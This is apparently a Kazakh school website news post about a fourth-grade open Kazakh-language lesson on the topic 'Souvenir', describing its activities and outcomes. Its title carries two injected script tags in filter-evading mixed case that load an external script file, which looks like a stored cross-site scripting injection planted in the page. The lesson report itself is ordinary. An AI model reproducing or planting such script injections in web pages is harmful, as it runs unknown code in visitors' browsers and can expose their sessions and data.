ҚАЗАҚ ТІЛІНЕН АШЫҚ САБАҚ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.11.2024

11 қараша күні 4 «В» сыныбында «Қәдесый» тақырыбында қазақ тілінен ашық сабақ өтті.
 Сабақтың басында балалар өткен тақырып бойынша жақсы білімдерін көрсетті: болжау кезеңінде сұрақтарға жауап берді, ребусты шешу арқылы тақырыпты анықтады. Сабақ барысында арнайы дайындалған мәтінді тыңдап, жұппен, жеке жұмыс жасады.Сабақ соңында балалар «Попс» әдісі арқылы өз ойларын білдірді.
Барлық материалдар оқу бағдарламасына және оқушылардың жас ерекшеліктеріне сәйкес болды. Жұптық жұмыс тиімді болып, балалар өздерінің интеллектуалдық қабілеттерін көрсете білді, және де оқу тапсырмасы сабақ барысында толық орындалды.
Сабақтың мақсаты орындалды.
Маженова С.Б

Просмотров: 395


Пікір қосу



Деректерді қолтаңбаға қосу